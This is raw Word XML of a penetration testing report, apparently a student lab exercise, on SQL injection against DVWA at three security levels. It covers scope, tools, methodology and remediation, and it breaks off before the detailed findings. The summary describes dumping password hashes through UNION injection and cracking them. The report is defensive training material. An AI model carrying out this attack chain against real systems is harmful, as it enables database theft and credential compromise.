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EBE3" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009556A1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>DVWA SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF24B3D" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Penetration Testing Report</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpY="1754"/>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7222E" w:rsidRPr="009556A1" w14:paraId="3EB07638" w14:textId="77777777" w:rsidTr="00F7222E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="1844F5D0" w14:textId="77777777" w:rsidR="00F7222E" w:rsidRPr="009556A1" w:rsidRDefault="00F7222E" w:rsidP="00F7222E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="2896DD31" w14:textId="77777777" w:rsidR="00F7222E" w:rsidRPr="009556A1" w:rsidRDefault="00F7222E" w:rsidP="00F7222E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F7222E" w:rsidRPr="009556A1" w14:paraId="720544D6" w14:textId="77777777" w:rsidTr="00F7222E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12B41EE2" w14:textId="77777777" w:rsidR="00F7222E" w:rsidRPr="009556A1" w:rsidRDefault="00F7222E" w:rsidP="00F7222E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23118418" w14:textId="77777777" w:rsidR="00F7222E" w:rsidRPr="009556A1" w:rsidRDefault="00F7222E" w:rsidP="00F7222E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Rohan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F7222E" w:rsidRPr="009556A1" w14:paraId="381FF926" w14:textId="77777777" w:rsidTr="00F7222E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F2EC7D1" w14:textId="77777777" w:rsidR="00F7222E" w:rsidRPr="009556A1" w:rsidRDefault="00F7222E" w:rsidP="00F7222E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50B4835A" w14:textId="77777777" w:rsidR="00F7222E" w:rsidRPr="009556A1" w:rsidRDefault="00F7222E" w:rsidP="00F7222E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>25/07/2026 – 26/07/2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F7222E" w:rsidRPr="009556A1" w14:paraId="137F76B5" w14:textId="77777777" w:rsidTr="00F7222E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DA5FE65" w14:textId="77777777" w:rsidR="00F7222E" w:rsidRPr="009556A1" w:rsidRDefault="00F7222E" w:rsidP="00F7222E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Target Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="241D4F7F" w14:textId="77777777" w:rsidR="00F7222E" w:rsidRPr="009556A1" w:rsidRDefault="00F7222E" w:rsidP="00F7222E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Damn Vulnerable Web Application (DVWA) v1.0.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F7222E" w:rsidRPr="009556A1" w14:paraId="31ADE291" w14:textId="77777777" w:rsidTr="00F7222E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BF9C0BE" w14:textId="77777777" w:rsidR="00F7222E" w:rsidRPr="009556A1" w:rsidRDefault="00F7222E" w:rsidP="00F7222E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5763FB55" w14:textId="77777777" w:rsidR="00F7222E" w:rsidRPr="009556A1" w:rsidRDefault="00F7222E" w:rsidP="00F7222E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Local lab (VirtualBox — Kali Linux attacker VM + DVWA target VM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29EB5C0A" w14:textId="76D9A3B9" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00F7222E">
      <w:r w:rsidRPr="009556A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="009556A1">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4536B297" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDBBF66" w14:textId="77777777" w:rsidR="00AA28FA" w:rsidRPr="00277CB5" w:rsidRDefault="00AA28FA" w:rsidP="00277CB5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>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this project, I tested DVWA's SQL Injection challenge at all three difficulty settings — Low, Medium, and High — to see how far a real attack could go, and where good security practices actually stopped it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4AA117" w14:textId="77777777" w:rsidR="00AA28FA" w:rsidRPr="00277CB5" w:rsidRDefault="00AA28FA" w:rsidP="00277CB5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>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Low security, the id field had zero protection. I was able to break out of the query using a simple UNION injection and pull the entire user table straight out of the database, including every password hash. From there, I ran the hashes through a dictionary attack and cracked them — and along the way noticed that two accounts were using the exact same password, which is its own separate risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D12E511" w14:textId="77777777" w:rsidR="00AA28FA" w:rsidRPr="00277CB5" w:rsidRDefault="00AA28FA" w:rsidP="00277CB5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>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 security added some escaping, but the underlying query still wasn't using quotes properly, so the same kind of attack worked with a small tweak to the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EAA4CE" w14:textId="77777777" w:rsidR="00AA28FA" w:rsidRPr="00277CB5" w:rsidRDefault="00AA28FA" w:rsidP="00277CB5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>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 security was a different story. It combined input escaping with a strict "must be a number" check before the query even runs, and that turned out to be genuinely effective — neither manual testing nor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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running at full strength could find a way through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC12E68" w14:textId="77777777" w:rsidR="00AA28FA" w:rsidRPr="00277CB5" w:rsidRDefault="00AA28FA" w:rsidP="00277CB5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>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big takeaway: the real problem isn't any one security level, it's that the queries were built by gluing user input directly into SQL text instead of using parameterized queries. The fix is straightforward — use prepared statements everywhere, don't give the app more database access than it needs, and stop storing passwords as plain unsalted MD5 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>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bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00277C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Argon2 should be the standard instead).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4296B16E" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>1. Project Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACCD9FC" w14:textId="77777777" w:rsidR="009556A1" w:rsidRPr="009556A1" w:rsidRDefault="00000000" w:rsidP="00277CB5">
      <w:pPr>
        <w:pStyle w:val="common"/>
      </w:pPr>
      <w:r w:rsidRPr="009556A1">
        <w:t xml:space="preserve">This project documents a hands-on penetration test against the SQL Injection module of DVWA across all three difficulty levels (Low, Medium, High). The goal was to practically demonstrate the full attack chain — from </w:t>
      </w:r>
      <w:r w:rsidR="009556A1" w:rsidRPr="009556A1">
        <w:t>exploitability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD367F9" w14:textId="77777777" w:rsidR="009556A1" w:rsidRPr="009556A1" w:rsidRDefault="009556A1" w:rsidP="009556A1">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009556A1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Disclaimer: This testing was conducted entirely within an isolated, intentionally vulnerable lab environment for educational purposes. No real-world systems were targeted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB347E" w14:textId="714BFFBE" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000" w:rsidP="009556A1">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009556A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vulnerability discovery through exploitation to credential compromise — while comparing how increasing security controls affect</w:t>
      </w:r>
      <w:r w:rsidR="009556A1" w:rsidRPr="009556A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A9C59A" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>2. Scope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F4032" w14:paraId="7EB9D877" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="4A0E7A23" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Item</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="28707EB6" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w14:paraId="3EC27CA1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AB250F4" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65D88711" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>http://192.168.100.20/dvwa/vulnerabilities/sqli/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w14:paraId="4DC5201B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46340414" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Vulnerability class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="548D5A11" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>SQL Injection (CWE-89, OWASP A03:2021 – Injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w14:paraId="3547A994" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E6D9529" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Security levels tested</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D000834" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Low, Medium, High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w14:paraId="7E6AB150" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="194161D1" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Tools used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C525A9A" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Burp Suite Community (Repeater), Firefox, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>hashcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> / John the Ripper</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w14:paraId="2BCCFBBC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E215581" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Attacker machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FDA110D" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009556A1">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kali Linux (VirtualBox)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71E2373B" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>3. Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6DCDC5" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009556A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Testing followed a standard structured approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257BB172" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009556A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance — Identify the injectable parameter and page </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009556A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="155322B5" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009556A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerability Identification — Confirm injection using syntax-breaking payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31672763" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009556A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exploitation — Determine column count, extract data via UNION-based injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5ECC31" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="009556A1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009556A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Post-Exploitation — Crack extracted password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CC5BBB" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009556A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reporting &amp; Remediation — Document findings and recommend fixes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7772330C" w14:textId="77777777" w:rsidR="009556A1" w:rsidRPr="009556A1" w:rsidRDefault="009556A1" w:rsidP="009556A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="80"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72E7C5EF" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:t>4. Findings by Security Level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A15A16" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="250" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 Low Security Level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F4032" w14:paraId="5E5BD222" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="0909C601" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="00F7222E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
